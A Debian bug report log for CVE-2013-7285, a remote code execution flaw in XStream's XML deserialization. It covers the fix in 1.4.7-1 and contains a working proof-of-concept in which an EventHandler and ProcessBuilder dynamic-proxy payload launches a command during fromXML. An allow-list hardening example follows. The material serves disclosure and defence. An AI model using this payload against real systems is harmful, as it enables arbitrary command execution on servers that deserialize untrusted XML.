libxstream-java: CVE-2013-7285: remote code execution via deserialization in XStream

Related Vulnerabilities: CVE-2013-7285  

Debian Bug report logs - #734821

Reported by: Salvatore Bonaccorso <>

Date: Fri, 10 Jan 2014 02:54:02 UTC

Severity: grave

Tags: security, upstream

Done: Emmanuel Bourg <>

Bug is archived. No further changes may be made.


Report forwarded to Debian Java Maintainers:
Bug#734821; Package libxstream-java. (Fri, 10 Jan 2014 02:54:06 GMT)

Acknowledgement sent to Salvatore Bonaccorso:
New Bug report received and forwarded. Copy sent to Debian Java Maintainers. (Fri, 10 Jan 2014 02:54:06 GMT)

Message #5:

From: Salvatore Bonaccorso <>
To: Debian Bug Tracking System <>
Subject: libxstream-java: CVE-2013-7285: remote code execution via deserialization in XStream
Date: Fri, 10 Jan 2014 03:51:22 +0100
Package: libxstream-java
Severity: grave
Tags: security upstream


The following vulnerability was published for libxstream-java.

remote code execution via deserialization in XStream

See also [1] for the original report. [3] contains an initial patch
which was committed.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:


Please adjust the affected versions in the BTS as needed.


Reply sent to Emmanuel Bourg:
You have taken responsibility. (Wed, 12 Mar 2014 13:36:23 GMT)

Notification sent to Salvatore Bonaccorso:
Bug acknowledged by developer. (Wed, 12 Mar 2014 13:36:23 GMT)

Message #10:

From: Emmanuel Bourg <>
Subject: Bug#734821: fixed in libxstream-java 1.4.7-1
Date: Wed, 12 Mar 2014 13:33:33 +0000
Source: libxstream-java
Source-Version: 1.4.7-1

We believe that the bug you reported is fixed in the latest version of
libxstream-java, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
Emmanuel Bourg <> (supplier of updated libxstream-java package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing

Format: 1.8
Date: Wed, 12 Mar 2014 14:06:33 +0100
Source: libxstream-java
Binary: libxstream-java
Architecture: source all
Version: 1.4.7-1
Distribution: unstable
Urgency: low
Maintainer: Debian Java Maintainers <>
Changed-By: Emmanuel Bourg <>
Description:
 libxstream-java - Java library to serialize objects to XML and back again
Closes: 734821
Changes:
 libxstream-java (1.4.7-1) unstable; urgency=low
   * New upstream release
     - Fixes CVE-2013-7285 (Closes: #734821)
     - Added a dependency on libjdom2-java
   * Standards-Version updated to 3.9.5 (no changes)
   * Use XZ compression for the upstream tarball
   * Build depend on debhelper >= 9
   * debian/copyright: Updated to the Copyright Format 1.0
Checksums-Sha1:
 684b6cc0d8edae45924832e4eedda12c780cb624 2343 libxstream-java_1.4.7-1.dsc
 329882aa8cb64b0ec729d840453a27608f59aba1 397328 libxstream-java_1.4.7.orig.tar.xz
 243eb22bca15817712111ca2645a867377ef2a8e 5960 libxstream-java_1.4.7-1.debian.tar.xz
 a41e3fee90ff5d6361d0538a84ea8afdcf32e33d 583860 libxstream-java_1.4.7-1_all.deb
Checksums-Sha256:
 8698da0a6520f6ab54efadad2e98c5d5e51f37faf0506b155208db85304bc3f2 2343 libxstream-java_1.4.7-1.dsc
 33aeb2217d2dd3734abcd6cc6f3d3283fed2646e4cbc79102d5237a099738eed 397328 libxstream-java_1.4.7.orig.tar.xz
 08c314aa33cb9164620110466cbe106369aedcc1e8718f1551bcce347c63004a 5960 libxstream-java_1.4.7-1.debian.tar.xz
 5a191aa57415acd1c5fb2f6af53ea7f751c615abb8bf9b00a9070f58cb19d322 583860 libxstream-java_1.4.7-1_all.deb
Files:
 c8d6431cf68e71eda78e67e950e079aa 2343 java optional libxstream-java_1.4.7-1.dsc
 09de7d2175bdc6c002aa681e3004d8d6 397328 java optional libxstream-java_1.4.7.orig.tar.xz
 3e72fa42334aaed7ec2248a9ffd3ccf1 5960 java optional libxstream-java_1.4.7-1.debian.tar.xz
 72573fdd9319ffae8b1d9dafd65e2c02 583860 java optional libxstream-java_1.4.7-1_all.deb


Information forwarded to Debian Java Maintainers:
Bug#734821; Package libxstream-java. (Fri, 10 Oct 2014 09:21:14 GMT)

Acknowledgement sent to Sébastien Delafond:
Extra info received and forwarded to list. Copy sent to Debian Java Maintainers. (Fri, 10 Oct 2014 09:21:14 GMT)

Message #15:

From: Sébastien Delafond <>
Subject: 734821
Date: Fri, 10 Oct 2014 11:19:58 +0200
notfixed 734821 1.4.7-1

This bug was actually never in Debian, since it was introduced in 1.4.5
and closed in 1.4.7.

If anyone is interested in verifying this, the following code can be run
against the JARs present at

  import java.io.IOException;

  import com.thoughtworks.xstream.XStream;
  import com.thoughtworks.xstream.io.xml.DomDriver;

  /* Thanks to pwntester for the PoC */
  public class XStreamExploit {
      public static void main(String[] args) throws IOException {
          // Command launched when the document is deserialized.
          String process = "/usr/bin/xeyes";
          // A sorted-set (TreeSet) holding a string and a dynamic proxy that
          // implements Comparable. Inserting the proxy makes TreeSet call
          // compareTo(), which java.beans.EventHandler forwards as the "start"
          // action on its ProcessBuilder target, so the command runs inside
          // fromXML() with no further interaction.
          String payload = "<sorted-set>" +
              "<string>foo</string>" +
              "<dynamic-proxy>" +
              "<interface>java.lang.Comparable</interface>" +
              "<handler class=\"java.beans.EventHandler\">" +
              " <target class=\"java.lang.ProcessBuilder\">" +
              " <command>" +
              " <string>" + process + "</string>" +
              " </command>" +
              " </target>" +
              " <action>start</action>" +
              "</handler>" +
              "</dynamic-proxy>" +
              "</sorted-set>";
          XStream xstream = new XStream(new DomDriver());
          // Parsing alone is enough on the affected versions (before the 1.4.7 fix).
          xstream.fromXML(payload);
      }
  }


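The same payload shape checked against a deny-by-default XStream configuration, added here as an example; it is not part of the bug report, the PoC, or XStream's own code. It assumes XStream 1.4.7 or later, where the type-permission API (addPermission, allowTypes, ForbiddenClassException) first appeared; the Order class, the "order" alias, the benign document and the proxy payload (with a harmless /bin/true command) are constructed for the demonstration.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.io.xml.DomDriver;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

/*
 * Added example (not from the bug report or XStream): an allow-listed XStream
 * instance beside a default one, exercised with an EventHandler/ProcessBuilder
 * payload. Requires XStream >= 1.4.7 for the security framework. The Order
 * type, alias and both documents are constructed here for illustration.
 */
public class XStreamHardening {

    /* Hypothetical application type: the only object graph we expect to receive. */
    public static class Order {
        public String id;
        public int quantity;
    }

    /* Constructed payload with the shape of the PoC: a TreeSet whose second element
     * is a dynamic proxy whose Comparable.compareTo() is routed by
     * java.beans.EventHandler to ProcessBuilder.start(). The command is harmless. */
    public static final String PROXY_PAYLOAD =
        "<sorted-set>" +
        "  <string>foo</string>" +
        "  <dynamic-proxy>" +
        "    <interface>java.lang.Comparable</interface>" +
        "    <handler class=\"java.beans.EventHandler\">" +
        "      <target class=\"java.lang.ProcessBuilder\">" +
        "        <command><string>/bin/true</string></command>" +
        "      </target>" +
        "      <action>start</action>" +
        "    </handler>" +
        "  </dynamic-proxy>" +
        "</sorted-set>";

    /* Constructed benign document that the application legitimately accepts. */
    public static final String ORDER_DOCUMENT =
        "<order><id>A-1</id><quantity>3</quantity></order>";

    /* Default-configured instance: no type restrictions at all. On the affected
     * releases this builds the proxy and starts the process while parsing
     * PROXY_PAYLOAD, exactly as the PoC above does. */
    public static XStream permissive() {
        XStream xs = new XStream(new DomDriver());
        xs.alias("order", Order.class);
        return xs;
    }

    /* Hardened instance: deny everything, then allow only the concrete types the
     * application needs. TreeSet, the JDK proxy and java.beans.EventHandler are
     * never on the list, so the payload is refused before any object exists. */
    public static XStream hardened() {
        XStream xs = new XStream(new DomDriver());
        xs.addPermission(NoTypePermission.NONE);              // deny-all baseline
        xs.addPermission(NullPermission.NULL);                // explicit nulls
        xs.addPermission(PrimitiveTypePermission.PRIMITIVES); // int, boolean, ...
        xs.allowTypes(new Class[] { String.class, Order.class });
        xs.alias("order", Order.class);
        return xs;
    }

    /* True when xs refuses the document on type-permission grounds. The
     * ForbiddenClassException may surface directly (top-level element) or wrapped
     * in a ConversionException (nested element), so the cause chain is walked. */
    public static boolean refusesOnTypePermission(XStream xs, String xml) {
        try {
            xs.fromXML(xml);
            return false;
        } catch (XStreamException e) {
            for (Throwable t = e; t != null; t = t.getCause()) {
                if (t instanceof ForbiddenClassException) {
                    return true;
                }
            }
            throw e; // any other failure is a real error; do not mask it
        }
    }

    public static void main(String[] args) {
        XStream safe = hardened();
        Order order = (Order) safe.fromXML(ORDER_DOCUMENT);
        System.out.println("benign document parsed: id=" + order.id
            + " quantity=" + order.quantity);
        System.out.println("hardened instance refuses proxy payload: "
            + refusesOnTypePermission(safe, PROXY_PAYLOAD));
        // Deliberately not called: permissive().fromXML(PROXY_PAYLOAD) runs the
        // embedded command on a vulnerable XStream.
    }
}
```

The allow-list is the durable control: the 1.4.7 fix closes this particular EventHandler route, but any later gadget reachable through the default converters is blocked the same way as long as the application lists concrete types rather than wildcards or whole packages.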
No longer marked as fixed in versions libxstream-java/1.4.7-1. Request was from Sébastien Delafond. (Fri, 10 Oct 2014 09:21:22 GMT)

Bug archived. Request was from Debbugs Internal Request. (Sat, 08 Nov 2014 07:26:44 GMT)

Last modified: Wed Jun 19 16:41:24 2019
